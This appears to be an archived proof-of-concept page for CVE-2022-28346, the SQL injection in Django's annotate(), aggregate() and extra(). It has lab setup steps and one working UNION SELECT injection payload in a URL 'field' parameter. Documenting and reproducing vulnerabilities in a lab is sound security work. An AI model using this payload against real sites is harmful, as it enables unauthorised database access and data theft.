CVE-2022-28346 PoC — Django SQL注入漏洞

Source

https://github.com/DeEpinGh0st/CVE-2022-28346

Associated Vulnerability

Title:Django SQL注入漏洞 (CVE-2022-28346)
Description:Django是Django基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 Django 2.2.28 版本之前的 2.2 版本、3.2.13 版本之前的 3.2 版本、4.0.4 版本之前的 4.0 版本存在SQL注入漏洞，QuerySet.annotate()、aggregate() 和 extra() 中存在 SQL 注入问题。

Description

Django QuerySet.annotate(), aggregate(), extra() SQL 注入

Readme

### CVE-2022-28346
Django QuerySet.annotate(), aggregate(), extra() SQL 注入

### 环境初始化
```
1.python manage.py makemigrations
2.python manage.py migrate
3.访问http://x.x.x.x:8000/ 插入初始化数据
```

### 漏洞复现

```
访问http://x.x.x.x:8000/demo
POC: http://x.x.x.x:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --
```

![image-20220426224053969](./image-20220426224053969.png)

### Docker

```
docker pull s0cke3t/cve-2022-28346:latest
```

File Snapshot


 [4.0K]  /data/pocs/4f13296ee29192f3975f2f5bf776039e54a12b18
├── [4.0K]  CVE_2022_28346
│   ├── [ 405]  asgi.py
│   ├── [   0]  __init__.py
│   ├── [3.2K]  settings.py
│   ├── [ 811]  urls.py
│   └── [ 405]  wsgi.py
├── [4.0K]  demo
│   ├── [  63]  admin.py
│   ├── [ 140]  apps.py
│   ├── [   0]  __init__.py
│   ├── [4.0K]  migrations
│   │   ├── [ 485]  0001_initial.py
│   │   └── [   0]  __init__.py
│   ├── [ 177]  models.py
│   ├── [  60]  tests.py
│   └── [ 592]  views.py
├── [ 46K]  image-20220426224053969.png
├── [ 670]  manage.py
├── [ 506]  README.md
└── [  14]  requirements.txt

3 directories, 17 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!